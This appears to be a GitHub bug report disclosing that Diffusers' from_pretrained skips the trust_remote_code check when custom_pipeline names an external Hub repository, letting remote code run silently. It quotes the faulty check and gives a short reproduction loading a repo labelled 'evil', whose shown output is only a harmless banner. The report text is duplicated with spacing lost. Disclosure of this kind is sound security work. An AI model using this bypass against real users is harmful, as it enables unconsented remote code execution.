Describe the bug
The DiffusionPipeline.from_pretrained API in the Diffusers library allows users to specify a custom_pipeline, which can point to an external Hugging Face repository containing a pipeline.py. This feature enables flexible extension of pipelines but may raise critical security concerns.
The current implementation enforces the trust_remote_code check only on the main model repository (pretrained_model_name), but fails to validate the external repository specified via custom_pipeline.
As a result, even when trust_remote_code=False, Diffusers may still download and execute arbitrary Python code from an attacker-controlled repository referenced by custom_pipeline. This creates a bypass of the intended security mechanism, leading to silent remote code execution.
Root Cause
|
load_pipe_from_hub = custom_pipeline is not None and f"{custom_pipeline}.py" in filenames |
|
load_components_from_hub = len(custom_components) > 0 |
|
|
|
if load_pipe_from_hub and not trust_remote_code: |
|
raise ValueError( |
|
f"The repository for {pretrained_model_name} contains custom code in {custom_pipeline}.py which must be executed to correctly " |
|
f"load the model. You can inspect the repository content at https://hf.co/{pretrained_model_name}/blob/main/{custom_pipeline}.py.\n" |
|
f"Please pass the argument `trust_remote_code=True` to allow custom code to be run." |
|
) |
|
|
|
if load_components_from_hub and not trust_remote_code: |
|
raise ValueError( |
|
f"The repository for {pretrained_model_name} contains custom code in {'.py, '.join([os.path.join(k, v) for k, v in custom_components.items()])} which must be executed to correctly " |
|
f"load the model. You can inspect the repository content at {', '.join([f'https://hf.co/{pretrained_model_name}/{k}/{v}.py' for k, v in custom_components.items()])}.\n" |
|
f"Please pass the argument `trust_remote_code=True` to allow custom code to be run." |
|
) |
|
|
|
# retrieve passed components that should not be downloaded |
|
pipeline_class = _get_pipeline_class( |
|
cls, |
|
config_dict, |
|
load_connected_pipeline=load_connected_pipeline, |
|
custom_pipeline=custom_pipeline, |
|
repo_id=pretrained_model_name if load_pipe_from_hub else None, |
|
hub_revision=revision, |
|
class_name=custom_class_name, |
|
cache_dir=cache_dir, |
|
revision=custom_revision, |
|
) |
The check does not inspect the external repository referenced by custom_pipeline. Therefore, If custom_pipeline points to another repository (e.g., XManFromXlab/diffuser-custom-pipeline), and the main repo does not contain the corresponding .py file, then load_pipe_from_hub evaluates to False. As a result, the security check is skipped entirely, and diffusers will proceed to fetch the external repository, load and execute its pipeline.py. This results in a trust boundary violation, where remote code execution occurs without explicit user consent.
Reproduction
I created an example model repository on HuggingFace Hub for demonstration: XManFromXlab/diffuser-custom-pipeline. Note that the trust_remote_code flag is set to False.
from diffusers import DiffusionPipeline
benign_repo = "google/ddpm-cifar10-32"
evil_repo = "XManFromXlab/diffuser-custom-pipeline"
DiffusionPipeline.from_pretrained(
benign_repo, custom_pipeline=evil_repo, trust_remote_code=False
)
In this example, it will print the following warning messages:
!!!!!!! Execute Malicious Payload !!!!!!!
!!!!!!! Execute Malicious Payload !!!!!!!
!!!!!!! Execute Malicious Payload !!!!!!!
!!!!!!! Execute Malicious Payload !!!!!!!
!!!!!!! Execute Malicious Payload !!!!!!!
Logs
System Info
- 🤗 Diffusers version: 0.38.0.dev0
- Platform: Linux-6.8.0-88-generic-x86_64-with-glibc2.39
- Running on Google Colab?: No
- Python version: 3.12.3
- PyTorch version (GPU?): 2.11.0+cu130 (False)
- Flax version (CPU?/GPU?/TPU?): not installed (NA)
- Jax version: not installed
- JaxLib version: not installed
- Huggingface_hub version: 1.10.1
- Transformers version: not installed
- Accelerate version: not installed
- PEFT version: not installed
- Bitsandbytes version: not installed
- Safetensors version: 0.7.0
- xFormers version: not installed
- Accelerator: NVIDIA H200 NVL, 143771 MiB
NVIDIA H200 NVL, 143771 MiB
NVIDIA H200 NVL, 143771 MiB
- Using GPU in script?:
- Using distributed or parallel set-up in script?:
Who can help?
@sayakpaul @DN6
Describe the bug
The
DiffusionPipeline.from_pretrainedAPI in the Diffusers library allows users to specify acustom_pipeline, which can point to an external Hugging Face repository containing apipeline.py. This feature enables flexible extension of pipelines but may raise critical security concerns.The current implementation enforces the
trust_remote_codecheck only on the main model repository (pretrained_model_name), but fails to validate the external repository specified viacustom_pipeline.As a result, even when
trust_remote_code=False, Diffusers may still download and execute arbitrary Python code from an attacker-controlled repository referenced bycustom_pipeline. This creates a bypass of the intended security mechanism, leading to silent remote code execution.Root Cause
diffusers/src/diffusers/pipelines/pipeline_utils.py
Lines 1676 to 1704 in dc8d903
The check does not inspect the external repository referenced by
custom_pipeline. Therefore, Ifcustom_pipelinepoints to another repository (e.g.,XManFromXlab/diffuser-custom-pipeline), and the main repo does not contain the corresponding.pyfile, thenload_pipe_from_hubevaluates toFalse. As a result, the security check is skipped entirely, and diffusers will proceed to fetch the external repository, load and execute itspipeline.py. This results in a trust boundary violation, where remote code execution occurs without explicit user consent.Reproduction
I created an example model repository on HuggingFace Hub for demonstration:
XManFromXlab/diffuser-custom-pipeline. Note that thetrust_remote_codeflag is set toFalse.In this example, it will print the following warning messages:
Logs
System Info
NVIDIA H200 NVL, 143771 MiB
NVIDIA H200 NVL, 143771 MiB
Who can help?
@sayakpaul @DN6